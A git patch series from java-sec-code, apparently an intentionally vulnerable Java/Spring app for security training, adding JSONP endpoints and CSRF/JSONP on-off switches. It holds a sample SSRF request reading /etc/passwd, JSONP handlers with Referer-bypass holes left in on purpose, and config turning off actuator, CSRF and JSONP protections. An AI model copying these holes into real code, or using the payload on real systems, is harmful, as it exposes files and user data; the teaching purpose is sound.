+- [SSRF](https://github.com/JoyChou93/java-sec-code/wiki/SSRF)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass)
 - [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
diff --git a/README_zh.md b/README_zh.md
index 66897133..1d8a5d3b 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -12,36 +12,38 @@
 
 ## 漏洞代码
 
-- [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
-- [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
-- [URL重定向](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java)
-- [IP伪造](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
-- [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
-- [CRLF注入](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
-- [远程命令执行](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
-- [反序列化](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
-- [文件上传](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
-- [SQL注入](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
-- [URL白名单Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java)
-- [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
-- [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
+- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml)
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
+- [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
+- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java)
+- [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
+- [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
+- [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
+- [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
+- [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java)
+- [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
 - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
-- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml)
-- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java)
+- [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
+- [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
+- [URL Redirect](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java)
+- [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java)
+- [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
+- [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
+
 
 ## 漏洞说明
 
-- [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI)
-- [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
-- [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject)
-- [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson)
+- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE)
 - [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
+- [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson)
+- [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
-- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE)
+- [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject)
+- [SSRF](https://github.com/JoyChou93/java-sec-code/wiki/SSRF)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass)
+- [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
 
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 3f731506..f774fb27 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -99,6 +99,11 @@ public static String ssrf_Request(HttpServletRequest request)
     }
 
 
+    /**
+     * Download the url file.
+     * http://localhost:8080/ssrf/openStream?url=file:///etc/passwd
+     *
+     */
     @RequestMapping("/openStream")
     @ResponseBody
     public static void ssrf_openStream (HttpServletRequest request, HttpServletResponse response) throws IOException {
@@ -155,6 +160,11 @@ public static void ssrf_okhttp(HttpServletRequest request) throws IOException {
     }
 
 
+    /**
+     * http://localhost:8080/ssrf/HttpClient?url=http://www.baidu.com
+     *
+     * @return The response of url param.
+     */
     @RequestMapping("/HttpClient")
     @ResponseBody
     public static String ssrf_HttpClient(HttpServletRequest request) {
@@ -180,10 +190,9 @@ public static String ssrf_HttpClient(HttpServletRequest request) {
 
 
     /**
-     * Safe code: http://localhost:8080/ssrf/commonsHttpClient?url=http://www.baidu.com
+     * Safe code.
+     * http://localhost:8080/ssrf/commonsHttpClient?url=http://www.baidu.com
      *
-     * @param request
-     * @return
      */
     @RequestMapping("/commonsHttpClient")
     @ResponseBody
@@ -229,10 +238,9 @@ public static String commonsHttpClient(HttpServletRequest request) {
 
 
     /**
-     * http://localhost:8080/ssrf/ImageIO_safe?url=
+     * Safe code.
+     * http://localhost:8080/ssrf/ImageIO_safe?url=http://www.baidu.com
      *
-     * @param request
-     * @return
      */
     @RequestMapping("/ImageIO_safe")
     @ResponseBody
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 5bc9d683..46d0ba39 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -22,9 +22,9 @@
 
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2017.12.22
- * @desc    Java XXE vul code.
+ * Java xxe vul and safe code.
+ *
+ * @author JoyChou @2017-12-22
  */
 
 @Controller

From 6844b0a7f0dc9e1bfc65de94ead593dffd73b982 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 3 Jul 2019 16:11:29 +0800
Subject: [PATCH 034/108] add configure code of  json to jsonp

---
 README.md                                     |  2 +-
 README_zh.md                                  |  2 +-
 .../java/org/joychou/controller/JSONP.java    | 71 ---------------
 .../org/joychou/controller/jsonp/JSONP.java   | 89 +++++++++++++++++++
 .../joychou/controller/jsonp/JSONPAdvice.java | 12 +++
 .../java/org/joychou/security/secFilter.java  | 10 +++
 src/main/resources/application.properties     |  5 +-
 7 files changed, 117 insertions(+), 74 deletions(-)
 delete mode 100644 src/main/java/org/joychou/controller/JSONP.java
 create mode 100644 src/main/java/org/joychou/controller/jsonp/JSONP.java
 create mode 100644 src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java

diff --git a/README.md b/README.md
index c7f42841..fe8e008b 100644
--- a/README.md
+++ b/README.md
@@ -15,7 +15,7 @@ Each vulnerability type code has a security vulnerability by default unless ther
 
 Sort by letter.
 
-- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml)
+- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml)
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
 - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java)
diff --git a/README_zh.md b/README_zh.md
index 1d8a5d3b..2cffe424 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -12,7 +12,7 @@
 
 ## 漏洞代码
 
-- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml)
+- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml)
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
 - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java)
diff --git a/src/main/java/org/joychou/controller/JSONP.java b/src/main/java/org/joychou/controller/JSONP.java
deleted file mode 100644
index 77bc47f4..00000000
--- a/src/main/java/org/joychou/controller/JSONP.java
+++ /dev/null
@@ -1,71 +0,0 @@
-package org.joychou.controller;
-
-import org.joychou.security.SecurityUtil;
-import org.springframework.stereotype.Controller;
-import org.springframework.web.bind.annotation.*;
-import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletResponse;
-
-
-/**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2018年10月24日
- */
-
-@Controller
-@RequestMapping("/jsonp")
-public class JSONP {
-
-    protected static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}";
-    protected static String[] urlwhitelist = {"joychou.com", "joychou.org"};
-
-
-    // http://localhost:8080/jsonp/referer?callback=test
-    @RequestMapping("/referer")
-    @ResponseBody
-    private static String referer(HttpServletRequest request, HttpServletResponse response) {
-        // JSONP的跨域设置
-        response.setHeader("Access-Control-Allow-Origin", "*");
-        String callback = request.getParameter("callback");
-        return callback + "(" + info + ")";
-    }
-
-    /**
-     * 直接访问不限制Referer，非直接访问限制Referer (开发同学喜欢这样进行JSONP测试)
-     * http://localhost:8080/jsonp/emptyReferer?callback=test
-     *
-     */
-    @RequestMapping("/emptyReferer")
-    @ResponseBody
-    private static String emptyReferer(HttpServletRequest request, HttpServletResponse response) {
-        String referer = request.getHeader("referer");
-        response.setHeader("Access-Control-Allow-Origin", "*");
-
-        // 如果referer不为空，并且referer不在安全域名白名单内，return error
-        // 导致空referer就会绕过校验。开发同学为了方便测试，不太喜欢校验空Referer
-        if (null != referer && !SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) {
-            return "error";
-        }
-
-        String callback = request.getParameter("callback");
-        return callback + "(" + info + ")";
-    }
-
-    // http://localhost:8080/jsonp/sec?callback=test
-    @RequestMapping("/sec")
-    @ResponseBody
-    private static String sec(HttpServletRequest request, HttpServletResponse response) {
-        // JSONP的跨域设置
-        response.setHeader("Access-Control-Allow-Origin", "*");
-        String referer = request.getHeader("referer");
-
-        if (!SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) {
-            return "error";
-        }
-
-        String callback = request.getParameter("callback");
-        return callback + "(" + info + ")";
-    }
-
-
-}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java
new file mode 100644
index 00000000..f78b2aa8
--- /dev/null
+++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java
@@ -0,0 +1,89 @@
+package org.joychou.controller.jsonp;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.JSONObject;
+import org.joychou.security.SecurityUtil;
+import org.springframework.http.MediaType;
+import org.springframework.web.bind.annotation.*;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+
+
+/**
+ * @author  JoyChou (joychou@joychou.org) @ 2018.10.24
+ * https://github.com/JoyChou93/java-sec-code/wiki/JSONP
+ */
+
+@RestController
+@RequestMapping("/jsonp")
+public class JSONP {
+
+    private static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}";
+    private static String[] urlwhitelist = {"joychou.com", "joychou.org"};
+
+
+    /**
+     * Set the response content-type to application/javascript.
+     *
+     * http://localhost:8080/jsonp/referer?callback=test
+     *
+     */
+    @RequestMapping(value = "/referer", produces = "application/javascript")
+    private static String referer(HttpServletRequest request, HttpServletResponse response) {
+        String callback = request.getParameter("callback");
+        return callback + "(" + info + ")";
+    }
+
+    /**
+     * Direct access does not check Referer, non-direct access check referer.
+     * Developer like to do jsonp testing like this.
+     *
+     * http://localhost:8080/jsonp/emptyReferer?callback=test
+     *
+     */
+    @RequestMapping(value = "/emptyReferer", produces = "application/javascript")
+    private static String emptyReferer(HttpServletRequest request, HttpServletResponse response) {
+        String referer = request.getHeader("referer");
+
+        if (null != referer && !SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) {
+            return "error";
+        }
+
+        String callback = request.getParameter("callback");
+        return callback + "(" + info + ")";
+    }
+
+    /**
+     * Adding callback or cback on parameter can automatically return jsonp data.
+     * http://localhost:8080/jsonp/advice?callback=test
+     * http://localhost:8080/jsonp/advice?cback=test
+     *
+     * @return Only return object, AbstractJsonpResponseBodyAdvice can be used successfully.
+     *         Such as JSONOjbect or JavaBean. String type cannot be used.
+     */
+    @RequestMapping(value = "/advice", produces = MediaType.APPLICATION_JSON_VALUE)
+    public JSONObject advice() {
+        return JSON.parseObject(info);
+
+    }
+
+    /**
+     * Safe code.
+     * http://localhost:8080/jsonp/sec?callback=test
+     */
+    @RequestMapping(value = "/sec", produces = "application/javascript")
+    private static String safecode(HttpServletRequest request, HttpServletResponse response) {
+        String referer = request.getHeader("referer");
+
+        if (!SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) {
+            return "error";
+        }
+
+        String callback = request.getParameter("callback");
+        return callback + "(" + info + ")";
+    }
+
+
+
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
new file mode 100644
index 00000000..19b3a6e0
--- /dev/null
+++ b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
@@ -0,0 +1,12 @@
+package org.joychou.controller.jsonp;
+
+import org.springframework.web.bind.annotation.ControllerAdvice;
+import org.springframework.web.servlet.mvc.method.annotation.AbstractJsonpResponseBodyAdvice;
+
+@ControllerAdvice
+public class JSONPAdvice extends AbstractJsonpResponseBodyAdvice {
+
+    public JSONPAdvice() {
+        super("callback", "cback");  // Can set multiple paramNames
+    }
+}
diff --git a/src/main/java/org/joychou/security/secFilter.java b/src/main/java/org/joychou/security/secFilter.java
index 072f7fca..a7f443f3 100644
--- a/src/main/java/org/joychou/security/secFilter.java
+++ b/src/main/java/org/joychou/security/secFilter.java
@@ -7,6 +7,7 @@
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
 import org.apache.commons.lang.StringUtils;
+import org.springframework.beans.factory.annotation.Value;
 
 
 /**
@@ -19,6 +20,9 @@
 @WebFilter(filterName = "referSecCheck", urlPatterns = "/*")
 public class secFilter implements Filter {
 
+    @Value("${org.joychou.security.jsonp}")
+    private Boolean jsonpSwitch;  // get application.properties configure
+
     @Override
     public void init(FilterConfig filterConfig) throws ServletException {
 
@@ -28,6 +32,12 @@ public void init(FilterConfig filterConfig) throws ServletException {
     public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain)
             throws IOException, ServletException {
 
+
+        // If don't check referer, return.
+        if (!jsonpSwitch) {
+            return ;
+        }
+
         HttpServletRequest request = (HttpServletRequest) req;
         HttpServletResponse response = (HttpServletResponse) res;
 
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index cdb84e53..47fdf5a3 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,4 +1,7 @@
 
 # Spring Boot Actuator Vulnerable Config
 management.security.enabled=false
-logging.config=classpath:logback-online.xml
\ No newline at end of file
+logging.config=classpath:logback-online.xml
+
+# jsonp check referer switch
+org.joychou.security.jsonp = true
\ No newline at end of file

From f37f9b2bc45d87653a70b4d0760e6e325508ebc9 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 3 Jul 2019 23:35:11 +0800
Subject: [PATCH 035/108] add csrf switch

---
 README.md                                          |  4 ++--
 README_zh.md                                       |  4 ++--
 .../{ => security}/CsrfAccessDeniedHandler.java    | 10 +++++-----
 .../joychou/{ => security}/WebSecurityConfig.java  | 14 +++++++++++++-
 .../security/{secFilter.java => jsonpFilter.java}  |  2 +-
 src/main/resources/application.properties          |  5 +++--
 6 files changed, 26 insertions(+), 13 deletions(-)
 rename src/main/java/org/joychou/{ => security}/CsrfAccessDeniedHandler.java (91%)
 rename src/main/java/org/joychou/{ => security}/WebSecurityConfig.java (86%)
 rename src/main/java/org/joychou/security/{secFilter.java => jsonpFilter.java} (97%)

diff --git a/README.md b/README.md
index fe8e008b..b1f4b020 100644
--- a/README.md
+++ b/README.md
@@ -18,13 +18,13 @@ Sort by letter.
 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml)
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
 - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
-- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java)
+- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
 - [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
 - [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
-- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java)
+- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
 - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
diff --git a/README_zh.md b/README_zh.md
index 2cffe424..e5d00569 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -15,13 +15,13 @@
 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml)
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
 - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
-- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java)
+- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
 - [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
 - [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
-- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java)
+- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
 - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
diff --git a/src/main/java/org/joychou/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
similarity index 91%
rename from src/main/java/org/joychou/CsrfAccessDeniedHandler.java
rename to src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
index ed043ac2..81b6b0f2 100644
--- a/src/main/java/org/joychou/CsrfAccessDeniedHandler.java
+++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
@@ -1,4 +1,4 @@
-package org.joychou;
+package org.joychou.security;
 
 
 import org.springframework.http.MediaType;
@@ -11,12 +11,12 @@
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
 
+/**
+ * Design csrf access denied page.
+ *
+ */
 public class CsrfAccessDeniedHandler implements AccessDeniedHandler {
 
-    /**
-     * Design csrf access denied page.
-     *
-     */
     @Override
     public void handle(HttpServletRequest request, HttpServletResponse response,
                        AccessDeniedException accessDeniedException) throws IOException, ServletException {
diff --git a/src/main/java/org/joychou/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
similarity index 86%
rename from src/main/java/org/joychou/WebSecurityConfig.java
rename to src/main/java/org/joychou/security/WebSecurityConfig.java
index 5254547e..68af7121 100644
--- a/src/main/java/org/joychou/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
@@ -1,5 +1,6 @@
-package org.joychou;
+package org.joychou.security;
 
+import org.springframework.beans.factory.annotation.Value;
 import org.springframework.context.annotation.Configuration;
 import org.springframework.security.config.annotation.web.builders.HttpSecurity;
 import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
@@ -10,10 +11,18 @@
 import java.util.Arrays;
 import java.util.HashSet;
 
+
+/**
+ * Congifure csrf
+ *
+ */
 @EnableWebSecurity
 @Configuration
 public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
 
+    @Value("${org.joychou.security.csrf}")
+    private Boolean csrfSwitch;  // get csrf switch in application.properties
+
     RequestMatcher csrfRequestMatcher = new RequestMatcher() {
 
         // 配置不需要CSRF校验的请求方式
@@ -23,6 +32,9 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
         @Override
         public boolean matches(HttpServletRequest request) {
             // return false表示不校验csrf
+            if (!csrfSwitch) {
+                return false;
+            }
             return !this.allowedMethods.contains(request.getMethod());
         }
 
diff --git a/src/main/java/org/joychou/security/secFilter.java b/src/main/java/org/joychou/security/jsonpFilter.java
similarity index 97%
rename from src/main/java/org/joychou/security/secFilter.java
rename to src/main/java/org/joychou/security/jsonpFilter.java
index a7f443f3..7fd2f123 100644
--- a/src/main/java/org/joychou/security/secFilter.java
+++ b/src/main/java/org/joychou/security/jsonpFilter.java
@@ -18,7 +18,7 @@
  *
  */
 @WebFilter(filterName = "referSecCheck", urlPatterns = "/*")
-public class secFilter implements Filter {
+public class jsonpFilter implements Filter {
 
     @Value("${org.joychou.security.jsonp}")
     private Boolean jsonpSwitch;  // get application.properties configure
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 47fdf5a3..a0469477 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,7 +1,8 @@
 
 # Spring Boot Actuator Vulnerable Config
 management.security.enabled=false
-logging.config=classpath:logback-online.xml
+# logging.config=classpath:logback-online.xml
 
 # jsonp check referer switch
-org.joychou.security.jsonp = true
\ No newline at end of file
+org.joychou.security.jsonp = true
+org.joychou.security.csrf = false
\ No newline at end of file

From d330c45a517d9369ea33f16492648fc5ab0a3626 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 4 Jul 2019 00:09:35 +0800
Subject: [PATCH 036/108] fix bug

---
 .../org/joychou/security/jsonpFilter.java     | 21 ++++++++-----------
 src/main/resources/application.properties     |  2 +-
 2 files changed, 10 insertions(+), 13 deletions(-)

diff --git a/src/main/java/org/joychou/security/jsonpFilter.java b/src/main/java/org/joychou/security/jsonpFilter.java
index 7fd2f123..e88d854f 100644
--- a/src/main/java/org/joychou/security/jsonpFilter.java
+++ b/src/main/java/org/joychou/security/jsonpFilter.java
@@ -32,27 +32,24 @@ public void init(FilterConfig filterConfig) throws ServletException {
     public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain)
             throws IOException, ServletException {
 
-
-        // If don't check referer, return.
-        if (!jsonpSwitch) {
-            return ;
-        }
-
         HttpServletRequest request = (HttpServletRequest) req;
         HttpServletResponse response = (HttpServletResponse) res;
 
         String refer = request.getHeader("referer");
         String referWhitelist[] = {"joychou.org", "joychou.com"};
 
-        // Check referer for all GET requests with callback parameters.
-        if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter("callback")) ){
-             // If the check of referer fails, a 403 forbidden error page will be returned.
-            if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){
-                response.sendRedirect("https://test.joychou.org/error3.html");
-                return;
+        if (jsonpSwitch) {
+            // Check referer for all GET requests with callback parameters.
+            if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter("callback")) ){
+                // If the check of referer fails, a 403 forbidden error page will be returned.
+                if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){
+                    response.sendRedirect("https://test.joychou.org/error3.html");
+                    return;
+                }
             }
         }
 
+
         filterChain.doFilter(req, res);
     }
 
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index a0469477..a3b3a4bb 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -4,5 +4,5 @@ management.security.enabled=false
 # logging.config=classpath:logback-online.xml
 
 # jsonp check referer switch
-org.joychou.security.jsonp = true
+org.joychou.security.jsonp = false
 org.joychou.security.csrf = false
\ No newline at end of file

From f24df6fe46e24234e9367992df06d80414e1801b Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 8 Jul 2019 18:04:14 +0800
Subject: [PATCH 037/108] add json to jsonp

---
 .../joychou/controller/jsonp/JSONPAdvice.java |  7 +-
 .../security/CsrfAccessDeniedHandler.java     |  6 ++
 .../java/org/joychou/security/HttpFilter.java | 89 +++++++++++++++++++
 .../org/joychou/security/SecurityUtil.java    | 14 ++-
 .../joychou/security/WebSecurityConfig.java   | 23 +++--
 .../org/joychou/security/jsonpFilter.java     | 60 -------------
 src/main/resources/application.properties     | 27 +++++-
 7 files changed, 151 insertions(+), 75 deletions(-)
 create mode 100644 src/main/java/org/joychou/security/HttpFilter.java
 delete mode 100644 src/main/java/org/joychou/security/jsonpFilter.java

diff --git a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
index 19b3a6e0..094070a4 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
@@ -1,12 +1,15 @@
 package org.joychou.controller.jsonp;
 
+import org.springframework.beans.factory.annotation.Value;
 import org.springframework.web.bind.annotation.ControllerAdvice;
 import org.springframework.web.servlet.mvc.method.annotation.AbstractJsonpResponseBodyAdvice;
 
+
 @ControllerAdvice
 public class JSONPAdvice extends AbstractJsonpResponseBodyAdvice {
 
-    public JSONPAdvice() {
-        super("callback", "cback");  // Can set multiple paramNames
+    // method of using @Value in constructor
+    public JSONPAdvice(@Value("${joychou.security.jsonp.callback}") String[] callback) {
+        super(callback);  // Can set multiple paramNames
     }
 }
diff --git a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
index 81b6b0f2..65d9e6f3 100644
--- a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
+++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
@@ -1,6 +1,8 @@
 package org.joychou.security;
 
 
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
 import org.springframework.http.MediaType;
 import org.springframework.security.access.AccessDeniedException;
 import org.springframework.security.web.access.AccessDeniedHandler;
